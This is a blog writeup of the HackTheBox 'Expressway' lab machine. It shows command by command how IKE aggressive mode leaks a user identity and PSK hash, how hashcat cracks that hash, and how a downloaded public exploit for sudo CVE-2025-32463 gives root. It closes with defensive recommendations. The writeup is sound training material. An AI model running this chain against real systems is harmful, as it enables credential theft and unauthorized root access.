HackTheBox Expressway Writeup - IKE VPN Exploitation & Sudo CVE | Daniele Latini

HackTheBox’s Expressway is a beginner-friendly Linux machine that teaches valuable lessons about VPN security, IKE (Internet Key Exchange) protocol enumeration, hash cracking, and modern sudo privilege escalation vulnerabilities. This writeup covers the complete exploitation chain from initial reconnaissance to root access.

Machine Information

Platform: Linux (Debian)
Difficulty: Easy
Categories: VPN Enumeration, Hash Cracking, CVE Exploitation

Learning Objectives

This challenge focuses on:

UDP port scanning and IKE protocol analysis
Aggressive mode IKE handshake exploitation
PSK (Pre-Shared Key) hash extraction and cracking
Identifying custom sudo installations
Exploiting CVE-2025-32463 for privilege escalation

Initial Reconnaissance

TCP Port Scanning

Starting with a standard TCP scan using nmap:

nmap -sV -O MACHINE_IP -T5

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)

Only SSH (port 22) is open on TCP. The service is running OpenSSH 10.0p2 on Debian 8.

Important Discovery

Finding only SSH open on TCP is a strong indicator to check UDP ports, especially in VPN-related challenges.

UDP Port Scanning

Always remember to scan UDP ports - many services run on UDP:

nmap -sU -sV MACHINE_IP -T5

Results:

PORT    STATE SERVICE
500/udp open  isakmp

Bingo! We found UDP port 500 running ISAKMP (Internet Security Association and Key Management Protocol), which is used by IKE for VPN negotiation.

IKE Protocol Enumeration

Understanding IKE

IKE (Internet Key Exchange) is the protocol used to set up security associations in IPsec VPN connections. It operates on UDP port 500 and uses two main modes:

Main Mode: More secure, exchanges information in encrypted form
Aggressive Mode: Faster but less secure, exchanges identity information in cleartext

Simple IKE Scan

Using ike-scan to probe the service:

sudo ike-scan MACHINE_IP

Output:

MACHINE_IP     Main Mode Handshake returned 
  HDR=(CKY-R=2ad62b0f5e7489c1) 
  SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK 
      LifeType=Seconds LifeDuration=28800) 
  VID=09002689dfd6b712 (XAUTH) 
  VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Key Findings:

Encryption: 3DES (weak by modern standards)
Hash: SHA1 (also considered weak)
Authentication: PSK (Pre-Shared Key)
Features: XAUTH and Dead Peer Detection enabled

Security Note

3DES and SHA1 are deprecated cryptographic algorithms vulnerable to various attacks. Their presence indicates potential security weaknesses.

Aggressive Mode Scan

Aggressive mode can leak identity information:

sudo ike-scan --aggressive MACHINE_IP

Output:

MACHINE_IP     Aggressive Mode Handshake returned 
  HDR=(CKY-R=6f25465c8c7d0f1f) 
  SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK 
      LifeType=Seconds LifeDuration=28800) 
  KeyExchange(128 bytes) 
  Nonce(32 bytes) 
  ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
  VID=09002689dfd6b712 (XAUTH) 
  VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) 
  Hash(20 bytes)

Interesting Discovery: ike@expressway.htb

This reveals the VPN user identity, which we’ll use for SSH access later.

Hash Extraction for Offline Cracking

Now let’s extract the PSK hash for offline cracking:

ike-scan -M -A MACHINE_IP --pskcrack=output.txt

Parameters explained:

-M: Makes the output easier to read when examining IKE protocol details
-A: Uses IKE Aggressive Mode instead of Main Mode
--pskcrack: Saves the PSK parameters to output.txt in a format suitable for offline cracking

Output:

MACHINE_IP     Aggressive Mode Handshake returned
        HDR=(CKY-R=2db8f6ce7d1ae9ee)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK 
            LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

The PSK hash has been successfully saved to output.txt and is now ready for cracking.

Hash Cracking with Hashcat

Identifying the Hash Type

The hash extracted from IKE aggressive mode is type 5400 in hashcat (IKE-PSK MD5/SHA1).

Cracking Process

hashcat -m 5400 -a 0 output.txt /usr/share/wordlists/rockyou.txt

Parameters explained:

-m 5400: Hash mode for IKE-PSK SHA1
-a 0: Straight dictionary attack
output.txt: Our extracted hash file
rockyou.txt: Popular password wordlist

Hashcat Output:

Hash.Mode........: 5400 (IKE-PSK SHA1)
Status...........: Cracked
Time.Started.....: Thu Oct  9 19:18:10 2025 (3 secs)
Speed.#1.........: 2068.3 kH/s
Progress.........: 8045568/14344385 (56.09%)
Recovered........: 1/1 (100.00%) Digests

Password: *************************

Success! We found the PSK password (No speedrunners allowed ;D).

Credentials Found

Username: ike (from IKE scan)
Password: ************************* (from hashcat)
Target: MACHINE_IP (SSH service)

Initial Access via SSH

Connecting to SSH

With our discovered credentials, let’s connect:

ssh ike@MACHINE_IP

Login successful:

ike@MACHINE_IP's password: *************************
Last login: Thu Oct  9 18:40:37 BST 2025 from 10.10.14.126 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC 
Debian 6.16.7-1 (2025-09-11) x86_64

ike@expressway:~$

We’re in! Now let’s escalate privileges to root.

Privilege Escalation

Initial Enumeration

First, check if we can run sudo:

ike@expressway:~$ sudo -l
Password: 
Sorry, try again.
Password: 
Sorry, try again.
Password: 
Sorry, user ike may not run sudo on expressway.

The sudo error message looks non-standard. This is suspicious.

Identifying Custom Sudo Installation

Let’s check the sudo binary location:

ike@expressway:~$ which sudo
/usr/local/bin/sudo

Red flag! The standard sudo location is /usr/bin/sudo, not /usr/local/bin/sudo. This indicates a custom or manually installed version.

Checking Sudo Version

ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

Running sudo version 1.9.17 from /usr/local/bin/ is highly suspicious and worth investigating for known vulnerabilities.

Vulnerability Research: CVE-2025-32463

A quick search reveals CVE-2025-32463 - a privilege escalation vulnerability affecting sudo versions up to 1.9.17.

Vulnerability Details:

CVE ID: CVE-2025-32463
Type: Local Privilege Escalation
Affected Versions: sudo ≤ 1.9.17
Attack Vector: Exploitation of sudo’s chroot handling
Nickname: “chwoot” (chroot + woot)

CVE-2025-32463 Overview

This vulnerability allows local users to escalate privileges to root by exploiting improper handling of the chroot environment in vulnerable sudo versions. The exploit works by manipulating sudo’s path resolution and security checks.

Exploiting CVE-2025-32463

Step 1: Download the exploit from GitHub:

# On your attacking machine
wget https://github.com/pr0v3rbs/CVE-2025-32463_chwoot/raw/main/sudo-chwoot.sh

# Transfer to target
scp sudo-chwoot.sh ike@MACHINE_IP:/tmp/exp.sh

Step 2: Make it executable and run:

ike@expressway:~$ chmod +x exp.sh
ike@expressway:~$ ./exp.sh

Exploitation Result:

ike@expressway:~$ ./exp.sh 
woot!
root@expressway:/# whoami
root

Success! We have root access!

Capturing the Flags

# User flag
root@expressway:/# cat /home/ike/user.txt
[USER_FLAG_HERE]

# Root flag
root@expressway:/# cat /root/root.txt
[ROOT_FLAG_HERE]

Technical Summary

Attack Chain Overview

Initial Recon: UDP scan revealed IKE service on port 500
IKE Enumeration: Aggressive mode scan leaked user identity (ike@expressway.htb)
Hash Extraction: Extracted PSK hash using ike-scan --pskcrack
Password Cracking: Cracked hash with hashcat (mode 5400) → *************************
Initial Access: SSH login with discovered credentials
Privilege Escalation: Exploited CVE-2025-32463 in custom sudo 1.9.17 installation

MITRE ATT&CK Mapping

T1190 - Exploit Public-Facing Application (IKE service enumeration)
T1110 - Brute Force (Offline hash cracking)
T1078 - Valid Accounts (SSH access with cracked credentials)
T1548 - Abuse Elevation Control Mechanism (Sudo vulnerability exploitation)

Key Takeaways

Security Lessons

Always scan UDP ports - Critical services like VPN often run on UDP
IKE Aggressive Mode is dangerous - It leaks identity information and PSK hashes
Weak cryptography is exploitable - 3DES and SHA1 are deprecated for good reason
Custom installations are risky - Non-standard binary locations indicate potential vulnerabilities
Keep software updated - CVE-2025-32463 was patched in later sudo versions

Tools Used

Tool	Purpose	Command
nmap	Port scanning	`nmap -sU -sV`
ike-scan	IKE enumeration	`ike-scan -M -A --pskcrack`
hashcat	Password cracking	`hashcat -m 5400`
ssh	Remote access	`ssh user@host`

Defensive Recommendations

Mitigation Strategies

For VPN Administrators:

Disable IKE Aggressive Mode entirely
Use IKEv2 with modern cryptography (AES-256, SHA-256+)
Implement strong PSK policies (long, random keys)
Use certificate-based authentication instead of PSK

For System Administrators:

Keep sudo updated to latest stable version
Avoid custom binary installations outside package managers
Monitor /usr/local/bin/ for unauthorized binaries
Implement file integrity monitoring (AIDE, Tripwire)

Conclusion

Expressway demonstrates a realistic attack scenario combining VPN misconfiguration with software vulnerability exploitation. The challenge teaches important lessons about:

The importance of comprehensive port scanning (TCP and UDP)
Dangers of deprecated cryptographic protocols
Offline password cracking techniques
Identifying and exploiting custom software installations
Researching and applying public CVE exploits

This machine serves as an excellent introduction to VPN security testing and privilege escalation via known vulnerabilities - skills essential for penetration testers and security professionals.

Additional Resources

Happy hacking and remember: always get proper authorization before testing! 🏴‍☠️